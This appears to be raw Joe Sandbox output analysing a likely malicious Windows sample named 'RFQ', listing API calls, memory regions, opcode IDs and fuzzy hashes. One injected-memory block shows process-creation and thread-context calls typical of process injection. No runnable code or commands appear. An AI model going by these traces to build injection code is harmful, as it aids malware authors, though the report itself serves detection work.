                                                                            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3199840319-0
                                                                          • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                          • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeInfoLibraryParametersSystem
                                                                          • String ID:
                                                                          • API String ID: 3403648963-0
                                                                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                          • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                          • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                          • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                          APIs
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          • __lock_file.LIBCMT ref: 00414A8D
                                                                            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                          • __fclose_nolock.LIBCMT ref: 00414A98
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                          APIs
                                                                          • __lock_file.LIBCMT ref: 00415012
                                                                          • __ftell_nolock.LIBCMT ref: 0041501F
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2999321469-0
                                                                          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 04031AA3
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04031B39
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04031B5B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                          • Instruction ID: eada1c1cf3de71a9acda7a873835fda71618f9feaa0c4dd5d706df0e748582f7
                                                                          • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                          • Instruction Fuzzy Hash: A112EE24E24658C6EB24DF60D8507DEB272EF68301F1090E9910DEB7A4E77A5F81CF5A
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                          • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                          • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                          • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                          • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                          • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                          • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                          • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                          • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                          • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file
                                                                          • String ID:
                                                                          • API String ID: 3031932315-0
                                                                          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                          APIs
                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                          • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                          • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                          • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wfsopen
                                                                          • String ID:
                                                                          • API String ID: 197181222-0
                                                                          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                          APIs
                                                                          • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                          • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                          • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                          • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 040322F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                          • Instruction ID: 4ed50f4569a6dabae743e2dddbe25440e1b8b52cb20ba13c55ebc2f798bd2840
                                                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                          • Instruction Fuzzy Hash: B5E0BF7494010DEFDB00EFA4D5496DD7BB4EF04302F1005A5FD05E7680DB309E648A62
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 040322F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction ID: 172a1a794255a3812b7b108d2c73797798c64b04aa6f1dcee18fa2b9c4f466d2
                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction Fuzzy Hash: 59E0E67494010DDFDB00EFB4D54969D7FB4EF04302F1005A5FD01E2280D6309D608A72
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                          • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                          • GetKeyState.USER32(00000009), ref: 0047C936
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                          • GetKeyState.USER32(00000010), ref: 0047C953
                                                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                          • _wcsncpy.LIBCMT ref: 0047CA29
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                          • SendMessageW.USER32 ref: 0047CA7F
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                          • ImageList_SetDragCursorImage.COMCTL32(00ADF330,00000000,00000000,00000000), ref: 0047CB9B
                                                                          • ImageList_BeginDrag.COMCTL32(00ADF330,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                          • SetCapture.USER32(?), ref: 0047CBB6
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                          • ReleaseCapture.USER32 ref: 0047CC3A
                                                                          • GetCursorPos.USER32(?), ref: 0047CC72
                                                                          • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                          • SendMessageW.USER32 ref: 0047CD12
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                          • SendMessageW.USER32 ref: 0047CD80
                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                          • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                          • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                          • GetParent.USER32(00000000), ref: 0047CDF7
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                          • SendMessageW.USER32 ref: 0047CE93
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,03041C90,00000000,?,?,?,?), ref: 0047CF1C
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                          • SendMessageW.USER32 ref: 0047CF6B
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,03041C90,00000000,?,?,?,?), ref: 0047CFE6
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                          • String ID: @GUI_DRAGID$F
                                                                          • API String ID: 3100379633-4164748364
                                                                          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                          APIs
